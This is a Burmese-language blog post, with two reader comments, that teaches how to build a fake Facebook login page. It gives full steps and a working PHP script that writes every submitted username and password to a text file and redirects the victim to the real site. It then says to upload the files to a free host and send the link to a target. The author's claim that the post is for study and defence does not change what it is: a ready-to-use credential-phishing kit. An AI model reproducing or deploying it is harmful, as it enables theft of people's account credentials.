ဒီပို႕စ္ေလးနဲ႕ပတ္သက္ျပီး ေျပာခ်င္တာတစ္ခုရွိပါတယ္။အဲ့ဒါကေတာ့ ကြၽန္ေတာ္က ဟတ္ကာတစ္ေယာက္မဟုတ္ပါဘူး။ကိုယ္သိထားတာေလးေတြ ၊ ကိုယ္တက္ထားတာေလးေတြ ၊ ကိုယ္ေလ့လာျဖစ္တာေလးေတြ ၊ ကိုယ္အသံုးျပဳလို႕ေကာင္းတာေလးေတြကို ျပန္လည္မွ်ေဝခ်င္တဲ့ လူငယ္တစ္ေယာက္ပါ။တကယ္ေတာ့ Hacking ဆိုတာ Game တစ္ခုလိုပါဘဲ။ အရမ္းစိတ္ဝင္စားစရာေကာင္းပါတယ္။ဝါသနာပါတဲ့သူေတြအတြက္ေတာ့ ေန႕ေတြ ညေတြပါ ေပ်ာက္သြားေအာင္ စြဲေဆာင္တဲ့ နည္းပညာတစ္ခုပါ။အခု ကြၽန္ေတာ္ေျပာမယ့္ Phishing နည္းပညာေလးကေတာ့ Hacker တစ္ေယာက္ရဲ့ ေျခလွမ္းအစလို႕ေျပာလို႕ရပါတယ္။ဟတ္ကင္း ကို ဝါသနာပါတဲ့လူငယ္တစ္ေယာက္ ဟတ္ကင္းေလာကထဲေရာက္လာျပီဆို အရင္ဆံုးဟတ္ျဖစ္ၾကတဲ့နည္းက Web Page အတုလုပ္ျပီး အျခားသူရဲ့ လွ်ိဳ႕ဝွက္နံဘက္ ကို ရယူတဲ့ နည္းလမ္းေလးပါ။သူ႕ကို PHISHING လို႕ေခၚပါတယ္။ကြၽန္ေတာ္ ဒီပို႕စ္ကိုေရးလိုက္တာဟာ စာဖတ္သူတို႕ကို သူမ်ားအေကာင့္ေတြလိုက္ဟတ္ဖို႕ ၊ နည္းပညာေလ့လာမွဳအားနည္းတဲ့ Internet User ေတြကို နည္းပညာသံုးျပီးတိုက္ခိုက္ႏိုင္ဖို႕ သင္ျပေပးတာမဟုတ္ပါဘူး။ေလ့လာဖို႕သက္သက္နဲ႕ ဘယ္လိုကာကြယ္ႏိုင္မလဲဆိုတာကို ေတြးေခၚႏိုင္ဖို႕အတြက္ နည္းပညာတစ္ခုအေနနဲ႕သာ ေရးသားေပးျခင္းျဖစ္ပါတယ္။
ဒီနည္းကိုသံုးျပီးေတာ့ တျခားသူရဲ့အေကာင့္ေတြကိုလိုက္ျပီးမတိုက္ခိုက္ဖို႕ ကြၽန္ေတာ္ အႏူးညႊန္႕ေတာင္းဆိုပါရေစ။
အခု ဥပမာအေနနဲ႕ Facebook Login စာမ်က္ႏွာအတုလုပ္ပံုလုပ္နည္းကို ရွင္းျပေပးပါမယ္။အဲ့ေတာ့ Facebook Login စာမ်က္ႏွာကိုတည္ေဆာက္ထားတဲ့ Code ေတြကိုယူဖို႕ www.facebook.com ကိုသြားလိုက္ပါ။ျပီးရင္ Right Click ႏွိပ္ျပီး View page source ကို ကလစ္လိုက္ပါ။က်လာတဲ့ ကုဒ္ေတြအကုန္လံုးကို Notepad ထဲ Copy ကူးထည့္လိုက္ပါ။ျပီးရင္ Ctrl + F အကူအညီနဲ႕ action ဆိုတာေလးကို ရွာပါ။ေတြ႕ျပီဆိုရင္ သူ႕ေဘးက www.facebook.com/login.php?login_attempt=1 ဆိုတဲ့ေနရာမွာ login.phpလို႕ ေျပာင္းျပီး index.html ဆိုတဲ့ နာမည္နဲ႕ Save လုပ္လိုက္ပါ။
ေနာက္ထပ္ Notepad တစ္ခု ထပ္ဖြင့္ထားပါ။ ျပီးရင္ ကြၽန္ေတာ္ ေအာက္မွာေပးထားတဲ့ ကုဒ္ေတြကို Notepad ထဲ Copy ကူးထည့္ျပီး login.php ဆိုတဲ့နာမည္နဲ႕ Save လိုက္ပါ။
<?php
header("Location: http://www.facebook.com");
$handle = fopen("pswrd.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
ေနာက္ထပ္ Notepad တစ္ခုဖြင့္ျပီး ဘာမွမေရးဘဲ pswrd.txt နာမည္နဲ႕ Save လိုက္ပါ။ အခုဆိုရင္ ကြၽန္ေတာ္တို႕ တစ္ခုျပီးတစ္ခု တည္ေဆာက္လာတာ index.html ၊ login.php ၊ pswrd.txt ဆိုျပီး ဖိုင္သံုးခုရသြားပါျပီ။ အဲ့ဒါကို ကြၽန္ေတာ္တို႕ Free hosting site တစ္ခုခုမွာ Upload တင္ရပါမယ္။အဲ့ေတာ့ မိမိၾကိဳက္ႏွစ္သက္ရာ Free hosting site တစ္ခုခုကို သြားလိုက္ပါ။ ကြၽန္ေတာ္ကေတာ့http://www.000webhost.comကိုသြားပါတယ္။အေကာင့္မရွိေသးရင္ ဖြင့္လိုက္ပါ။အေကာင့္ရသြားျပီဆိုရင္ File manager ကိုဝင္ျပီး ေစာေစာက ကြၽန္ေတာ္တို႕တည္ေဆာက္ထားတဲ့ ဖိုင္သံုးခုကို Upload တင္လိုက္ပါ။ျပီးသြားရင္ေတာ့ ကိုယ့္ဟတ္မယ့္သူဆီ အဲ့ဒီလင့္ေလး ပို႕ျပီး Login ဝင္လာေအာင္ စြဲေဆာင္ပါ။ သူဝင္လိုက္တယ္ဆိုရင္ေတာ့ မိမိ ေဆာက္ထားတဲ့ pswrd.txt ဆိုတဲ့ ဖိုင္ေလးထဲကို User name နဲ႕ password ေရာက္လာပါလိမ့္မယ္။ဒါဆိုရင္ ကြၽန္ေတာ္တို႕ Facebook Login Page လုပ္ျပီး ဟတ္တဲ့နည္းေလး ျပီးသြားပါျပီ။ကိုယ့္အေကာင့္နဲ႕ကိုယ့္ဘာသာကိုျပန္စမ္းၾကည့္ၾကပါ။နည္းပညာေတြေလ့လာရင္ ေပ်ာ္ရႊင္ၾကပါေစခဗ်ာ ...
MAUBINTHARLAY
2 comments:
Computer မွာပဲရတာလား ဖုန္းမွာေရာရလား
ဒီနည္းလမ္းက ဖုန္းမွာသံုးလိုရလား
ေျပာျပပါ ေနာ္
Post a Comment